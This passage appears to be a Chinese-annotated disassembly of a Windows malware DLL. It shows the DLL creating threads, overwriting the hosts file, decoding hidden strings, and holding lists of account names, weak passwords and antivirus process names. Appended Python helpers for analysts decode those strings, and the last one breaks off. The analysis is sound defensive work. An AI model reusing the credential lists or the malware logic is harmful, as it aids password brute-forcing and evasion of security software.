dword ptr [ebp+C], eax 10005DCD 837D 0C 00 cmp dword ptr [ebp+C], 0 10005DD1 74 11 je short 10005DE4 10005DD3 A1 9C940010 mov eax, dword ptr [1000949C] 10005DD8 85C0 test eax, eax 10005DDA 74 08 je short 10005DE4 10005DDC 57 push edi 10005DDD 56 push esi 10005DDE 53 push ebx 10005DDF FFD0 call eax 10005DE1 8945 0C mov dword ptr [ebp+C], eax 10005DE4 8B45 0C mov eax, dword ptr [ebp+C] 10005DE7 5F pop edi 10005DE8 5E pop esi 10005DE9 5B pop ebx 10005DEA 5D pop ebp 10005DEB C2 0C00 retn 0C f(x,y,z)函数,创建线程的分析: 100032FD 55 push ebp ; f(x,y,z) 成功返回true,创建线程,过程函数332a 100032FE 8BEC mov ebp, esp 10003300 837D 0C 01 cmp dword ptr [ebp+C], 1 ; y==0? 10003304 75 1D jnz short 10003323 ; y不等于零就跳 转 10003306 8B45 08 mov eax, dword ptr [ebp+8] 10003309 A3 7C940010 mov dword ptr [1000947C], eax ; 把x给 【947c】 1000330E 6A 00 push 0 10003310 6A 00 push 0 10003312 6A 00 push 0 10003314 68 2A330010 push 1000332A ; ThreadFunction = 6to4.1000332A 10003319 6A 00 push 0 ; StackSize = 0 1000331B 6A 00 push 0 ; pSecurity = NULL 1000331D FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 10003323 33C0 xor eax, eax 10003325 40 inc eax 10003326 5D pop ebp 10003327 C2 0C00 retn 0C 在主程序中海还调用了的自定义函数f1【4910】0(x,y,z): 10005CA6 8B4424 08 mov eax, dword ptr [esp+8] ; 函数f1 【4910】0(x,y,z) 10005CAA 85C0 test eax, eax 10005CAC 75 0E jnz short 10005CBC ; y不等于零就跳 转 10005CAE 3905 10900010 cmp dword ptr [10009010], eax 10005CB4 7E 2E jle short 10005CE4 10005CB6 FF0D 10900010 dec dword ptr [10009010] 10005CBC 8B0D 90610010 mov ecx, dword ptr [10006190] ; MSVCRT._adjust_fdiv 10005CC2 83F8 01 cmp eax, 1 10005CC5 8B09 mov ecx, dword ptr [ecx] 10005CC7 890D 90940010 mov dword ptr [10009490], ecx 10005CCD 75 3F jnz short 10005D0E ; eax等于不等 于一就跳转 10005CCF 68 80000000 push 80 ; 分配80字节空 间 10005CD4 FF15 94610010 call dword ptr [10006194] ; MSVCRT.malloc 10005CDA 85C0 test eax, eax ; pam80刚分 配的地址空间 10005CDC 59 pop ecx 10005CDD A3 98940010 mov dword ptr [10009498], eax ; 把刚分配的空间 pam80地址给10009498 10005CE2 75 04 
jnz short 10005CE8 10005CE4 33C0 xor eax, eax ; 分配失败就返回 false 10005CE6 EB 66 jmp short 10005D4E 10005CE8 8320 00 and dword ptr [eax], 0 10005CEB A1 98940010 mov eax, dword ptr [10009498] 10005CF0 68 04800010 push 10008004 10005CF5 68 00800010 push 10008000 10005CFA A3 94940010 mov dword ptr [10009494], eax 10005CFF E8 EA000000 call 10005DEE ; jmp 到 MSVCRT._initterm 10005D04 FF05 10900010 inc dword ptr [10009010] ; 【9010】加 一 10005D0A 59 pop ecx 10005D0B 59 pop ecx 10005D0C EB 3D jmp short 10005D4B ; 退出是返回一, 再【9498】存分配的80地址空间 10005D0E 85C0 test eax, eax 10005D10 75 39 jnz short 10005D4B ; 不等于零也跳转 退出函数,返回1 10005D12 A1 98940010 mov eax, dword ptr [10009498] 10005D17 85C0 test eax, eax 10005D19 74 30 je short 10005D4B 10005D1B 8B0D 94940010 mov ecx, dword ptr [10009494] 10005D21 56 push esi 10005D22 8D71 FC lea esi, dword ptr [ecx-4] 10005D25 3BF0 cmp esi, eax 10005D27 72 12 jb short 10005D3B 10005D29 8B0E mov ecx, dword ptr [esi] 10005D2B 85C9 test ecx, ecx 10005D2D 74 07 je short 10005D36 10005D2F FFD1 call ecx 10005D31 A1 98940010 mov eax, dword ptr [10009498] 10005D36 83EE 04 sub esi, 4 10005D39 ^ EB EA jmp short 10005D25 10005D3B 50 push eax 10005D3C FF15 9C610010 call dword ptr [1000619C] ; MSVCRT.free 10005D42 8325 98940010 0>and dword ptr [10009498], 0 10005D49 59 pop ecx 10005D4A 5E pop esi 10005D4B 6A 01 push 1 10005D4D 58 pop eax 10005D4E C2 0C00 retn 0C 主函数创建的线程函数,创建几个子线程,创建了系统目录\dllcache\systembox.bak,并打开了该文件的内存映射 系统目录/drivers/etc/hosts文件在文件中写ASCII "127.0.0.1 localhost",CR,LF 1000332A 55 push ebp ; 线程过程 函数 1000332B 8BEC mov ebp, esp 1000332D 6A FF push -1 1000332F 68 186D0010 push 10006D18 10003334 68 705E0010 push 10005E70 ; 定义 excepion_re的第二成员进栈MSVCRT._except_handler3 10003339 64:A1 00000000 mov eax, dword ptr fs:[0] ; 前一个异 常handler3,fs【0】上是exception_restration结构指针 1000333F 50 push eax 10003340 64:8925 0000000>mov dword ptr fs: [0], esp ; fs【0】指向刚定义的excepion_re 10003347 51 push ecx 10003348 51 push ecx 10003349 81EC 44010000 sub esp, 144 ; 分配空间 1000334F 
53 push ebx 10003350 56 push esi 10003351 57 push edi 10003352 8965 E8 mov dword ptr [ebp- 18], esp ; s_esp记录【ebp-18】 10003355 68 E4670010 push 100067E4 ; 创建事 件 ASCII "4F9E860C-9BE9-474b-8FD1-F0EEDB20C77B" 1000335A 6A 00 push 0 1000335C 6A 01 push 1 1000335E 6A 00 push 0 10003360 FF15 38610010 call dword ptr [10006138] ; kernel32.CreateEventA 10003366 A3 80940010 mov dword ptr [10009480], eax ; hevent 【9480】事件句柄 1000336B 833D 80940010 0>cmp dword ptr [10009480], 0 10003372 74 0D je short 10003381 10003374 FF15 94600010 call dword ptr [10006094] ; ntdll.RtlGetLastWin32Error 1000337A 3D B7000000 cmp eax, 0B7 1000337F 75 08 jnz short 10003389 ; 不是 0b7错误就继续执行,是就退出 10003381 6A 00 push 0 10003383 FF15 98600010 call dword ptr [10006098] ; kernel32.ExitThread 10003389 8365 FC 00 and dword ptr [ebp-4], 0 1000338D E8 BB030000 call 1000374D ; 线程中可 以创建事件,就调用sleep函数 10003392 834D FC FF or dword ptr [ebp-4], FFFFFFFF 10003396 EB 0B jmp short 100033A3 10003398 33C0 xor eax, eax 1000339A 40 inc eax 1000339B C3 retn 1000339C 8B65 E8 mov esp, dword ptr [ebp-18] 1000339F 834D FC FF or dword ptr [ebp-4], FFFFFFFF 100033A3 6A 00 push 0 100033A5 6A 00 push 0 100033A7 6A 00 push 0 100033A9 68 333F0010 push 10003F33 100033AE 6A 00 push 0 100033B0 6A 00 push 0 100033B2 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 100033B8 6A 00 push 0 100033BA 6A 00 push 0 100033BC 6A 00 push 0 100033BE 68 D7180010 push 100018D7 100033C3 6A 00 push 0 100033C5 6A 00 push 0 100033C7 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 100033CD 8945 E0 mov dword ptr [ebp-20], eax 100033D0 6A 00 push 0 100033D2 6A 00 push 0 100033D4 6A 00 push 0 100033D6 68 8D3A0010 push 10003A8D 100033DB 6A 00 push 0 100033DD 6A 00 push 0 100033DF FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 100033E5 6A 00 push 0 100033E7 6A 00 push 0 100033E9 6A 00 push 0 100033EB 68 18460010 push 10004618 100033F0 6A 00 push 0 100033F2 6A 00 push 0 100033F4 FF15 68610010 call dword ptr 
[10006168] ; kernel32.CreateThread 100033FA 33C0 xor eax, eax 100033FC 40 inc eax 100033FD 74 36 je short 10003435 100033FF FF15 6C610010 call dword ptr [1000616C] ; kernel32.GetTickCount 10003405 8985 CCFEFFFF mov dword ptr [ebp-134], eax ; 获得系统 开机到当前的时间 1000340B 8B85 CCFEFFFF mov eax, dword ptr [ebp- 134] ; tickcount【ebp-134】 10003411 33D2 xor edx, edx 10003413 B9 E8030000 mov ecx, 3E8 10003418 F7F1 div ecx ; tickcount/3e8 1000341A 33D2 xor edx, edx 1000341C 6A 3C push 3C 1000341E 59 pop ecx 1000341F F7F1 div ecx 10003421 83F8 03 cmp eax, 3 ; tickcount/3e8 /3c再跟3比较大小 10003424 72 02 jb short 10003428 10003426 EB 0D jmp short 10003435 10003428 68 E8030000 push 3E8 ; 等等 3e8微妙 1000342D FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep 10003433 ^ EB C5 jmp short 100033FA ; 再回去取 系统时间,直到tickcount/3e8/3c比3小 10003435 68 04010000 push 104 1000343A 6A 00 push 0 1000343C 8D85 D0FEFFFF lea eax, dword ptr [ebp-130] 10003442 50 push eax 10003443 E8 46280000 call 10005C8E ; jmp 到 MSVCRT.memset 10003448 83C4 0C add esp, 0C 1000344B 68 04010000 push 104 10003450 8D85 D0FEFFFF lea eax, dword ptr [ebp-130] 10003456 50 push eax 10003457 FF15 2C610010 call dword ptr [1000612C] ; kernel32.GetSystemDirectoryA 1000345D 68 0C680010 push 1000680C ; ASCII "\drivers\etc\hosts" 10003462 8D85 D0FEFFFF lea eax, dword ptr [ebp-130] 10003468 50 push eax 10003469 FF15 E4600010 call dword ptr [100060E4] ; kernel32.lstrcatA 1000346F 6A 00 push 0 10003471 68 80000000 push 80 10003476 6A 03 push 3 10003478 6A 00 push 0 1000347A 6A 03 push 3 1000347C 68 000000C0 push C0000000 10003481 8D85 D0FEFFFF lea eax, dword ptr [ebp-130] ; 系统目录 /drivers/etc/hosts 10003487 50 push eax 10003488 FF15 C0600010 call dword ptr [100060C0] ; kernel32.CreateFileA 1000348E 8945 D8 mov dword ptr [ebp-28], eax 10003491 C745 DC 2068001>mov dword ptr [ebp-24], 10006820 ; ASCII "127.0.0.1 localhost",CR,LF 10003498 6A 00 push 0 1000349A 8D45 E4 lea eax, dword ptr [ebp-1C] 1000349D 50 push eax 1000349E FF75 DC push dword 
ptr [ebp-24] 100034A1 FF15 C8600010 call dword ptr [100060C8] ; kernel32.lstrlenA 100034A7 50 push eax ; 长度 100034A8 FF75 DC push dword ptr [ebp-24] ; ASCII "127.0.0.1 localhost",CR,LF 100034AB FF75 D8 push dword ptr [ebp-28] ; 创建文件 “系统目录/drivers/etc/hosts”,并向文件中写入“127.0.0.1 localhost 100034AE FF15 30610010 call dword ptr [10006130] ; kernel32.WriteFile 100034B4 FF75 D8 push dword ptr [ebp-28] 100034B7 FF15 18610010 call dword ptr [10006118] ; kernel32.SetEndOfFile 100034BD FF75 D8 push dword ptr [ebp-28] 100034C0 FF15 FC600010 call dword ptr [100060FC] ; kernel32.CloseHandle 100034C6 68 04010000 push 104 100034CB 6A 00 push 0 100034CD 68 28930010 push 10009328 100034D2 E8 B7270000 call 10005C8E ; jmp 到 MSVCRT.memset 100034D7 83C4 0C add esp, 0C 100034DA 68 04010000 push 104 100034DF 68 28930010 push 10009328 100034E4 FF15 2C610010 call dword ptr [1000612C] ; kernel32.GetSystemDirectoryA 100034EA 68 3C680010 push 1000683C ; ASCII "\dllcache\systembox.bak" 100034EF 68 28930010 push 10009328 ; 系统目 录\dllcache\systembox.bak 100034F4 FF15 E4600010 call dword ptr [100060E4] ; kernel32.lstrcatA 100034FA 83A5 C8FEFFFF 0>and dword ptr [ebp-138], 0 10003501 EB 0D jmp short 10003510 10003503 8B85 C8FEFFFF mov eax, dword ptr [ebp-138] 10003509 40 inc eax 1000350A 8985 C8FEFFFF mov dword ptr [ebp-138], eax 10003510 83BD C8FEFFFF 6>cmp dword ptr [ebp-138], 64 10003517 7D 57 jge short 10003570 ; 创建64 次文件才停止 10003519 6A 00 push 0 1000351B 68 80000000 push 80 10003520 6A 03 push 3 10003522 6A 00 push 0 10003524 6A 00 push 0 10003526 68 00000080 push 80000000 1000352B 68 28930010 push 10009328 ; 创建了系 统目录\dllcache\systembox.bak 10003530 FF15 C0600010 call dword ptr [100060C0] ; kernel32.CreateFileA 10003536 8985 C4FEFFFF mov dword ptr [ebp-13C], eax 1000353C 83BD C4FEFFFF F>cmp dword ptr [ebp-13C], -1 10003543 74 21 je short 10003566 10003545 6A 00 push 0 10003547 FFB5 C4FEFFFF push dword ptr [ebp-13C] 1000354D FF15 C4600010 call dword ptr [100060C4] ; kernel32.GetFileSize 10003553 
A3 84940010 mov dword ptr [10009484], eax 10003558 FFB5 C4FEFFFF push dword ptr [ebp-13C] 1000355E FF15 FC600010 call dword ptr [100060FC] ; kernel32.CloseHandle 10003564 EB 0A jmp short 10003570 10003566 6A 64 push 64 ; 等待64 微秒 10003568 FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep 1000356E ^ EB 93 jmp short 10003503 10003570 833D 84940010 0>cmp dword ptr [10009484], 0 10003577 0F86 F5000000 jbe 10003672 1000357D 833D 84940010 F>cmp dword ptr [10009484], -1 10003584 0F84 E8000000 je 10003672 1000358A 6A 00 push 0 1000358C 68 80000000 push 80 10003591 6A 03 push 3 10003593 6A 00 push 0 10003595 6A 01 push 1 10003597 68 00000080 push 80000000 1000359C 68 28930010 push 10009328 ; 再创建文 件 100035A1 FF15 C0600010 call dword ptr [100060C0] ; kernel32.CreateFileA 100035A7 A3 04900010 mov dword ptr [10009004], eax 100035AC 6A 00 push 0 100035AE 6A 00 push 0 100035B0 6A 00 push 0 100035B2 6A 02 push 2 100035B4 6A 00 push 0 100035B6 FF35 04900010 push dword ptr [10009004] ; 创建文件 映射,刚创建的文件句柄 100035BC FF15 58610010 call dword ptr [10006158] ; kernel32.CreateFileMappingA 100035C2 A3 74940010 mov dword ptr [10009474], eax 100035C7 6A 00 push 0 ; 映射字 节,0表全部 100035C9 6A 00 push 0 100035CB 6A 00 push 0 100035CD 6A 04 push 4 ; 权限 100035CF FF35 74940010 push dword ptr [10009474] ; 映射文件 一部分到线程空间,文件映射句柄 100035D5 FF15 10610010 call dword ptr [10006110] ; kernel32.MapViewOfFile 100035DB A3 70940010 mov dword ptr [10009470], eax ; 映射内存 地址 100035E0 833D 54840010 0>cmp dword ptr [10008454], 0 100035E7 74 1E je short 10003607 100035E9 833D 70940010 0>cmp dword ptr [10009470], 0 100035F0 74 15 je short 10003607 ; 映射失败 跳转 100035F2 6A 00 push 0 100035F4 6A 00 push 0 100035F6 6A 00 push 0 100035F8 68 1F310010 push 1000311F ; 线程过程 函数 100035FD 6A 00 push 0 100035FF 6A 00 push 0 ; 映射成 功,就创建线程 10003601 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 10003607 833D 60840010 0>cmp dword ptr [10008460], 0 1000360E 74 18 je short 10003628 10003610 6A 00 push 0 10003612 6A 00 
push 0 10003614 68 54680010 push 10006854 ; 传入参 数 ASCII "LAN" 10003619 68 65520010 push 10005265 1000361E 6A 00 push 0 10003620 6A 00 push 0 10003622 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 10003628 833D 5C840010 0>cmp dword ptr [1000845C], 0 1000362F 74 15 je short 10003646 10003631 6A 00 push 0 10003633 6A 00 push 0 10003635 6A 00 push 0 10003637 68 E1580010 push 100058E1 1000363C 6A 00 push 0 1000363E 6A 00 push 0 10003640 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 10003646 6A FF push -1 ; 无限等待 10003648 FF75 E0 push dword ptr [ebp-20] ; 等待过程 函数为18d7的线程执行完 1000364B FF15 1C610010 call dword ptr [1000611C] ; kernel32.WaitForSingleObject 10003651 833D 64840010 0>cmp dword ptr [10008464], 0 10003658 74 18 je short 10003672 1000365A 6A 00 push 0 1000365C 6A 00 push 0 1000365E 68 58680010 push 10006858 ; 传入参数 ASCII "Internet" 10003663 68 65520010 push 10005265 10003668 6A 00 push 0 1000366A 6A 00 push 0 1000366C FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 10003672 833D 68840010 0>cmp dword ptr [10008468], 0 10003679 74 29 je short 100036A4 1000367B 6A 01 push 1 1000367D 0FB705 50840010 movzx eax, word ptr [10008450] 10003684 50 push eax 10003685 E8 E2DAFFFF call 1000116C 1000368A 83F8 01 cmp eax, 1 1000368D 75 15 jnz short 100036A4 1000368F 6A 00 push 0 10003691 6A 00 push 0 10003693 6A 00 push 0 10003695 68 CB5A0010 push 10005ACB 1000369A 6A 00 push 0 1000369C 6A 00 push 0 1000369E FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 100036A4 833D 6C840010 0>cmp dword ptr [1000846C], 0 100036AB 74 7B je short 10003728 100036AD 8D85 A4FEFFFF lea eax, dword ptr [ebp-15C] 100036B3 50 push eax 100036B4 FF15 90600010 call dword ptr [10006090] ; kernel32.GetLocalTime 100036BA 33C0 xor eax, eax 100036BC 40 inc eax 100036BD 74 69 je short 10003728 100036BF 8D85 B4FEFFFF lea eax, dword ptr [ebp-14C] 100036C5 50 push eax 100036C6 FF15 90600010 call dword ptr [10006090] ; kernel32.GetLocalTime 100036CC 
0FB785 BCFEFFFF movzx eax, word ptr [ebp-144] 100036D3 0FB78D ACFEFFFF movzx ecx, word ptr [ebp-154] 100036DA 2BC1 sub eax, ecx 100036DC 3B05 6C840010 cmp eax, dword ptr [1000846C] 100036E2 7C 37 jl short 1000371B 100036E4 66:8B85 BCFEFFF>mov ax, word ptr [ebp-144] 100036EB 66:8985 ACFEFFF>mov word ptr [ebp-154], ax 100036F2 6A 01 push 1 100036F4 0FB705 50840010 movzx eax, word ptr [10008450] 100036FB 50 push eax 100036FC E8 6BDAFFFF call 1000116C 10003701 83F8 01 cmp eax, 1 10003704 75 15 jnz short 1000371B 10003706 6A 00 push 0 10003708 6A 00 push 0 1000370A 6A 00 push 0 1000370C 68 CB5A0010 push 10005ACB 10003711 6A 00 push 0 10003713 6A 00 push 0 10003715 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 1000371B 68 60EA0000 push 0EA60 10003720 FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep 10003726 ^ EB 92 jmp short 100036BA 10003728 33C0 xor eax, eax 1000372A 40 inc eax 1000372B 74 0D je short 1000373A 1000372D 68 10270000 push 2710 10003732 FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep 10003738 ^ EB EE jmp short 10003728 1000373A 33C0 xor eax, eax 1000373C 8B4D F0 mov ecx, dword ptr [ebp-10] 1000373F 64:890D 0000000>mov dword ptr fs:[0], ecx 10003746 5F pop edi 10003747 5E pop esi 10003748 5B pop ebx 10003749 C9 leave 1000374A C2 0400 retn 4 线程自定义的函数: sleep函数1000374D 函数功能: 睡眠【8480】秒 【【8488】】=((byte)【8488】-1)^a5 8518 ; 取字符串的一字节 ASCII "n,Administrator,Guest,admin,Root,"2c清零 8540; ASCII "n,1234,password,6969,harley,123456,golf,pussy,mustang,1111,shadow,1313,fish,5150,7777,qwerty,baseball ,2112,letmein,12345678,12345,ccc,admin,5201314,qq520,1,12,123,1234567,123456789,654321,54321,111,000000,abc,pw,11111111 ,88888888,pass,pa"...2c清零 87B0 ; ASCII "360hotfix.exe|360rpt.exe|360safe.exe|360safebox.exe|360tray.exe|agentsvr.exe|apvxdwin.exe|ast.exe| avcenter.exe|avengine.exe|avgnt.exe|avguard.exe|avltmain.exe|avp32.exe|avtask.exe|bdagent.exe|bdwizreg.exe|boxmod.exe| ccapp.exe|ccenter.exe"... 
; 处理完字符串就跳转,把7c和2c清零 函数的具体分析: 1000374D 55 push ebp ; sleep 函数 1000374E 8BEC mov ebp, esp 10003750 51 push ecx 10003751 51 push ecx 10003752 8365 FC 00 and dword ptr [ebp-4], 0 10003756 FF35 80840010 push dword ptr [10008480] 1000375C FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep 10003762 6A 40 push 40 10003764 6A 00 push 0 10003766 68 30940010 push 10009430 ; 【9430】 清空 1000376B E8 1E250000 call 10005C8E ; jmp 到 MSVCRT.memset 10003770 83C4 0C add esp, 0C 10003773 68 00010000 push 100 10003778 6A 00 push 0 1000377A 68 28920010 push 10009228 ; 【9228】 清零 1000377F E8 0A250000 call 10005C8E ; jmp 到 MSVCRT.memset 10003784 83C4 0C add esp, 0C 10003787 C745 FC 8884001>mov dword ptr [ebp-4], 10008488 ; 读 取【8488】的一个字节 1000378E 8B45 FC mov eax, dword ptr [ebp-4] 10003791 0FBE00 movsx eax, byte ptr [eax] 10003794 85C0 test eax, eax ; 判断这个 字节是否为零 10003796 74 2D je short 100037C5 ; 为零,处 理完8488字符串,就跳转 10003798 8B45 FC mov eax, dword ptr [ebp-4] ; 不为零 【8488】存在pstr(【ebp-4】),取一字节给【ebp-5】 1000379B 8A00 mov al, byte ptr [eax] 1000379D 8845 FB mov byte ptr [ebp-5], al 100037A0 8A45 FB mov al, byte ptr [ebp-5] 100037A3 2C 01 sub al, 1 100037A5 8845 FB mov byte ptr [ebp-5], al ; 存在 【ebp-5】的字节减去一 100037A8 0FBE45 FB movsx eax, byte ptr [ebp-5] 100037AC 35 A5000000 xor eax, 0A5 100037B1 8845 FB mov byte ptr [ebp- 5], al ; 【ebp-5】再和a5异或 100037B4 8B45 FC mov eax, dword ptr [ebp-4] 100037B7 8A4D FB mov cl, byte ptr [ebp-5] 100037BA 8808 mov byte ptr [eax], cl ; 【【8488】】= ((byte)【8488】-1)^a5 100037BC 8B45 FC mov eax, dword ptr [ebp-4] 100037BF 40 inc eax 100037C0 8945 FC mov dword ptr [ebp- 4], eax ; pstr[ebp-4]指向下一个字节 100037C3 ^ EB C9 jmp short 1000378E 100037C5 C745 FC D084001>mov dword ptr [ebp-4], 100084D0 100037CC 8B45 FC mov eax, dword ptr [ebp-4] 100037CF 0FBE00 movsx eax, byte ptr [eax] ; 取 (byte)【84d0】判断是否为零 100037D2 85C0 test eax, eax 100037D4 74 2D je short 10003803 100037D6 8B45 FC mov eax, dword ptr [ebp-4] ; pstr 【ebp-4】 100037D9 8A00 mov al, byte ptr [eax] 100037DB 8845 
FA mov byte ptr [ebp-6], al 100037DE 8A45 FA mov al, byte ptr [ebp-6] 100037E1 2C 01 sub al, 1 100037E3 8845 FA mov byte ptr [ebp-6], al 100037E6 0FBE45 FA movsx eax, byte ptr [ebp-6] 100037EA 35 A5000000 xor eax, 0A5 100037EF 8845 FA mov byte ptr [ebp-6], al 100037F2 8B45 FC mov eax, dword ptr [ebp-4] 100037F5 8A4D FA mov cl, byte ptr [ebp-6] 100037F8 8808 mov byte ptr [eax], cl ; 【【8488】】= ((byte)【8488】-1)^a5 100037FA 8B45 FC mov eax, dword ptr [ebp-4] 100037FD 40 inc eax 100037FE 8945 FC mov dword ptr [ebp-4], eax ; pstr 【ebp-4】指向下雨字节 10003801 ^ EB C9 jmp short 100037CC ; 处理完两 个字符串就执行 10003803 C745 FC 1885001>mov dword ptr [ebp-4], 10008518 ; ASCII "n,Administrator,Guest,admin,Root," 1000380A 8B45 FC mov eax, dword ptr [ebp-4] 1000380D 0FBE00 movsx eax, byte ptr [eax] ; 取字符串 的一字节 ASCII "n,Administrator,Guest,admin,Root," 10003810 85C0 test eax, eax 10003812 74 1A je short 1000382E ; 处理完整 个字符串就跳转,把字符串的2c清零 10003814 8B45 FC mov eax, dword ptr [ebp-4] 10003817 0FBE00 movsx eax, byte ptr [eax] 1000381A 83F8 2C cmp eax, 2C ; 字符串一 字节是否是2c, ASCII "n,Administrator,Guest,admin,Root," 1000381D 75 06 jnz short 10003825 ; 不是2c 就跳转 1000381F 8B45 FC mov eax, dword ptr [ebp-4] ; 是2c, 把该字节清零 10003822 C600 00 mov byte ptr [eax], 0 10003825 8B45 FC mov eax, dword ptr [ebp-4] ; pstr 指向下一字节 10003828 40 inc eax 10003829 8945 FC mov dword ptr [ebp-4], eax 1000382C ^ EB DC jmp short 1000380A 1000382E C745 FC 4085001>mov dword ptr [ebp-4], 10008540 ; ASCII "n,1234,password,6969,harley,123456,golf,pussy,mustang,1111,shadow,1313,fish,5150,7777,qwerty,baseball,2112,letmein,12345678,12345,ccc,admin,5201314,qq520,1,12,123,1234567,123456789,654321,54321,111,000000,abc,pw,11111111,88888888,pass,pa"... 
10003835 8B45 FC mov eax, dword ptr [ebp-4] 10003838 0FBE00 movsx eax, byte ptr [eax] 1000383B 85C0 test eax, eax 1000383D 74 1A je short 10003859 ; 处理完就 跳转,把2c清零 1000383F 8B45 FC mov eax, dword ptr [ebp-4] 10003842 0FBE00 movsx eax, byte ptr [eax] 10003845 83F8 2C cmp eax, 2C 10003848 75 06 jnz short 10003850 1000384A 8B45 FC mov eax, dword ptr [ebp-4] 1000384D C600 00 mov byte ptr [eax], 0 10003850 8B45 FC mov eax, dword ptr [ebp-4] 10003853 40 inc eax 10003854 8945 FC mov dword ptr [ebp-4], eax 10003857 ^ EB DC jmp short 10003835 10003859 C745 FC B087001>mov dword ptr [ebp-4], 100087B0 ; ASCII "360hotfix.exe|360rpt.exe|360safe.exe|360safebox.exe|360tray.exe|agentsvr.exe|apvxdwin.exe|ast.exe|avcenter.exe|avengine.exe|avgnt.exe|avguard.exe|avltmain.exe|avp32.exe|avtask.exe|bdagent.exe|bdwizreg.exe|boxmod.exe|ccapp.exe|ccenter.exe"... 10003860 8B45 FC mov eax, dword ptr [ebp-4] 10003863 0FBE00 movsx eax, byte ptr [eax] 10003866 85C0 test eax, eax 10003868 74 25 je short 1000388F ; 处理完字 符串就跳转,把7c和2c清零 1000386A 8B45 FC mov eax, dword ptr [ebp-4] 1000386D 0FBE00 movsx eax, byte ptr [eax] 10003870 83F8 7C cmp eax, 7C 10003873 74 0B je short 10003880 10003875 8B45 FC mov eax, dword ptr [ebp-4] 10003878 0FBE00 movsx eax, byte ptr [eax] 1000387B 83F8 2C cmp eax, 2C 1000387E 75 06 jnz short 10003886 10003880 8B45 FC mov eax, dword ptr [ebp-4] 10003883 C600 00 mov byte ptr [eax], 0 10003886 8B45 FC mov eax, dword ptr [ebp-4] 10003889 40 inc eax 1000388A 8945 FC mov dword ptr [ebp-4], eax 1000388D ^ EB D1 jmp short 10003860 1000388F C9 leave 10003890 C3 retn |
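The string preparation done by the "sleep" function above (the (byte - 1) ^ 0xA5 decode at 1000378E/100037CC and the separator-to-NUL splitting at 1000380A/10003835/10003860) is the kind of routine an analyst re-implements to recover the hidden strings from a dump. The Python below is an added example, not code from the sample or from the original post. The transform and the separators are taken from the listing; the function names are mine, and the "hidden" plaintext is constructed for the demo, since the post does not show the bytes at 10008488 or 100084D0.

```python
"""Analyst helpers for the string scheme used by 6to4.dll's function at 1000374D.
Added example; the encoded sample string below is constructed, not from the DLL."""

XOR_KEY = 0xA5


def decode_in_place(buf: bytearray, start: int) -> int:
    """Apply *p = ((byte)*p - 1) ^ 0xA5 to the NUL-terminated string at
    buf[start:], exactly as the loops at 1000378E and 100037CC do.
    Returns the offset of the terminating NUL."""
    i = start
    while buf[i] != 0:
        # sub al,1 runs before the xor and both are 8-bit operations
        buf[i] = ((buf[i] - 1) & 0xFF) ^ XOR_KEY
        i += 1
    return i


def encode(plain: bytes) -> bytes:
    """Inverse transform, c = (p ^ 0xA5) + 1, handy for recognising the same
    scheme in other samples. A plaintext byte whose encoding would be 0
    (that is 'Z', 0x5A) cannot be stored, because the decoder stops at NUL."""
    out = bytearray()
    for p in plain:
        c = ((p ^ XOR_KEY) + 1) & 0xFF
        if c == 0:
            raise ValueError("byte %#x cannot be represented in this scheme" % p)
        out.append(c)
    return bytes(out)


def split_list(buf: bytearray, start: int, separators: bytes) -> list:
    """Overwrite every separator byte of the NUL-terminated string at
    buf[start:] with NUL (the loops at 1000380A, 10003835 and 10003860) and
    return the resulting fields in order. A trailing separator yields a
    trailing empty field, just as it leaves an empty string in memory."""
    i = start
    while buf[i] != 0:
        if buf[i] in separators:
            buf[i] = 0
        i += 1
    return [f.decode("latin-1") for f in bytes(buf[start:i]).split(b"\x00")]


def demo_strings() -> dict:
    """Build a constructed image of the .data strings, run the same steps the
    DLL runs, and return what an analyst would read back from memory."""
    hidden = b"example.invalid/config"  # constructed plaintext, not the sample's
    image = bytearray()
    off_hidden = len(image)
    image += encode(hidden) + b"\x00"
    off_users = len(image)
    image += b"n,Administrator,Guest,admin,Root,\x00"      # quoted in the listing
    off_pw = len(image)
    image += b"n,1234,password,6969,harley,123456\x00"     # first entries of the list
    off_av = len(image)
    image += b"360safe.exe|avp32.exe|avguard.exe\x00"      # first entries of the list
    decode_in_place(image, off_hidden)
    return {
        "hidden": bytes(image[off_hidden:off_hidden + len(hidden)]).decode(),
        "users": split_list(image, off_users, b","),
        "passwords": split_list(image, off_pw, b","),
        "av": split_list(image, off_av, b"|,"),
    }


if __name__ == "__main__":
    for key, value in demo_strings().items():
        print(key, value)
```

Because the routine walks until the first NUL, any byte that decodes from 0 is unreachable: (0 - 1) ^ 0xA5 is 0x5A, so an encoded string in this sample can never contain the letter Z. That is a cheap sanity check when you think you have found another string protected the same way.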
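The openservice function in tem81.exe walks the svchost netsvcs list and matches each service's ServiceDll against a target path with lstrcmpiA. The Python below is an added example, not code from the sample or from the original post: it re-implements that lookup on a constructed registry snapshot and adds the check a responder would run on a real snapshot to find a netsvcs slot that points somewhere unusual. The registry key paths are the real Windows ones; the snapshot contents and the function names (parse_multi_sz, find_service_by_dll, suspicious_netsvcs) are mine.

```python
"""Re-implementation of openservice's netsvcs/ServiceDll lookup plus a hunting
check. Added example; the registry snapshot below is constructed."""

NETSVCS_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"
PARAMS_FMT = r"SYSTEM\CurrentControlSet\Services\%s\Parameters"   # the format string at 00402340


def parse_multi_sz(blob: bytes) -> list:
    """Walk a REG_MULTI_SZ the way the loop at 00401B1E does: lstrlenA, step
    past the NUL, stop at the first empty string (the double NUL)."""
    names, pos = [], 0
    while pos < len(blob) and blob[pos] != 0:
        end = blob.find(b"\x00", pos)
        if end < 0:          # tolerate a blob without the final double NUL
            end = len(blob)
        names.append(blob[pos:end].decode("latin-1"))
        pos = end + 1
    return names


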